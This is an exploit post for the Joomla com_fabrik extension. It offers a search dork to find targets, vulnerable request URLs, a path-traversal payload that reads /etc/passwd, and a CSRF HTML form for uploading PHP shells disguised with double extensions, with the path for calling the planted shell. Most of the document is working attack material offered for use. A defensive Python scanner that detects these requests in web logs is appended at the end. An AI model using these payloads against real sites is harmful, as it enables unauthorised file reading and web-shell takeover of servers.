Joomla Com_Fabrik pluginAjax importcsv _advancedsearch getprodimg controller LFI with htaccess CSRF Shell Access Vulnerability.


[ Exploit Title ] => Joomla Com_Fabrik pluginAjax importcsv _advancedsearch getprodimg controller LFI with htaccess CSRF Shell Access Vulnerability.
[ Vendor Homepage ] => extensions.joomla.org/extension/fabrik/ ~ fabrikar.com
[ Google Dorks ] => inurl:''/index.php?option=com_fabrik''
[ Admin Login ] => /administrator/

[ Exploit 1 ]

/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

#Vulnerability / Error :

{"filepath":null,"uri":null}
or
{"error":"Error. Unable to upload file."}
===========================================

[ Exploit 2 ]

/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

/index.php?option=com_fabrik&c=import&view=import&fietype=csv&tableid=0

Directory File Path : /media/
===========================================

[ Exploit 3 ]

/index.php?option=com_fabrik&format=partial&view=list&layout=_advancedsearch&tmpl=component&listid=11

/index.php?option=com_fabrik&format=partial&view=list&layout=_advancedsearch&tmpl=component&listid=12&nextview=list&scope=com_fabrik&tkn=[RANDOM-HASH-NUMBERS]

Note : if the website responds with a message like ''Sorry this form it not published'' when this request is tried, it is not vulnerable. The bug has already been fixed.
===========================================

[ Exploit 4 ]

/component/fabrik/form/8/index.php?option=com_fabrik&format=raw&controller=plugin&c=plugin&task=userAjax&method=getprodimg

#Vulnerability / Error :

{"id":8,"model":"table","errors":[],"data":{"___betrieb":[""],"___modell":"","___betreff":"Probefahrt","___firma":"","___anrede":["0"],"___name":"","___email":"","___strasse":"","___plz":"","___ort":"","___telefon":"","___bemerkungen":"","___empfaenger":"","___captcha":"","___datenschutz":[""]},"html":{"___betrieb":"\r\n","___modell":"","___betreff":"<!-- Probefahrt -->","___firma":"","___anrede":"bitte wählen","___name":"","___email":"","___strasse":"","___plz":"","___ort":"","___telefon":"","___bemerkungen":"","___empfaenger":"<!-- -->","___captcha":"","___datenschutz":""},"post":{"option":"com_fabrik","format":"raw","controller":"plugin","c":"plugin","task":"userAjax","method":"getprodimg\\","Itemid":null,"view":"form","formid":"8","rowid":"index"}}
===========================================

[ Exploit 5 => LFI ]

/index.php?option=com_fabrik&controller=[Local File Inclusion]

/index.php?option=com_fabrik&controller=../../../../../../../../../../etc/passwd%00

Note : If the response to this request is "0 Call to a member function getData() on null", the site has already been patched.
===========================================

# CSRF => Save with the .html extension

<!DOCTYPE html>
<html>
<head>
<title>CSRF :: Com_Fabrik File Upload Shell Acces</title>
<style type="text/css">
body {
text-align: center;
display: flex;
justify-content: center;
align-items: center;
color: #fff;
font-family:Arial,sans-serif;
}

.razzer-form {
width: 400px;
position: relative;
background: #2a2a2a;
text-align: center;
box-shadow: -5px -5px 10px rgba(255,255,255, 0.2),
5px 5px 15px rgba(0,0,0,0.7);
padding: 40px 40px 60px;
border-radius: 10px;
margin-top: 50%;
}

form {
margin-top: 20px;
}

h1 {
font-size: 23px;
}

label {
text-align: left;
}

</style>
</head>
<body>
<div class="razzer-form">
<h1> CSRF => Com_Fabrik File Upload Shell Acces</h1>
<label> Author Code : M.Ridwan // Tupai_Kun </label>
<form method="POST" action="pastekan dsini target serta exploit nya"
enctype="multipart/form-data">
<input type="file" name="file" onclick="alert('Upload File : .html .htm .php .jpg .txt .gif .shell.php.jpg .shell.PhP.jpeg .shell.php.png')">
<input type="submit" value="Gas">
</form>
</div>
</body>
</html>


===========================================

# Exploit 1 => Once the file has been uploaded, the result looks like this.

{"filepath":"\/.htaccess","uri":"http:\/\/contohweb.com\/.htaccess"}

# To call the shell : razzerhacker.blogspot.com/media/shell.php
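
For defenders, the request patterns listed under Exploits 1, 2, 4 and 5 can be matched in web server access logs. The script below is an added example, not part of the original post; the combined log format, the rule names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Client IP, request target and status from a combined-format log line (assumed format).
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3})')

def classify(url):
    """Return the com_fabrik request patterns listed on this page that `url` matches."""
    # parse_qs decodes once; unquote decodes again to catch double encoding (%2500).
    q = {k.lower(): unquote(v[-1]) for k, v in
         parse_qs(urlsplit(url).query, keep_blank_values=True).items()}
    if q.get("option", "").lower() != "com_fabrik":
        return []
    task, method = q.get("task", "").lower(), q.get("method", "").lower()
    hits = []
    if (task == "plugin.pluginajax" and q.get("plugin", "").lower() == "fileupload"
            and method == "ajax_upload"):
        hits.append("fileupload_ajax")        # Exploit 1
    if q.get("view", "").lower() == "import" and q.get("c", "").lower() == "import":
        hits.append("csv_import_view")        # Exploit 2
    if task == "userajax" and method.startswith("getprodimg"):
        hits.append("userajax_getprodimg")    # Exploit 4
    # A controller name never needs path separators, dot-dot or a NUL byte.
    if any(tok in q.get("controller", "") for tok in ("..", "/", "\\", "\x00")):
        hits.append("controller_traversal")   # Exploit 5
    return hits

def scan(lines):
    """Return (client_ip, status, rule) for every matching log line."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            ip, url, status = m.groups()
            findings.extend((ip, int(status), rule) for rule in classify(url))
    return findings

# Constructed sample log lines (documentation IP ranges), not taken from a real server.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "POST /index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload HTTP/1.1" 200 61 "-" "-"',
    '192.0.2.10 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?option=com_fabrik&controller=..%2F..%2F..%2Fetc%2Fpasswd%2500 HTTP/1.1" 500 120 "-" "-"',
    '198.51.100.7 - - [01/Jan/2024:10:01:00 +0000] "GET /index.php?option=com_fabrik&view=list&listid=3 HTTP/1.1" 200 5120 "-" "-"',
    '198.51.100.7 - - [01/Jan/2024:10:02:00 +0000] "GET /component/fabrik/form/8/index.php?option=com_fabrik&format=raw&controller=plugin&c=plugin&task=userAjax&method=getprodimg HTTP/1.1" 200 900 "-" "-"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A hit on `fileupload_ajax` with status 200 is worth following up by checking the site root and /media/ for unexpected .htaccess or script files, since the log line alone does not show whether the upload succeeded.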
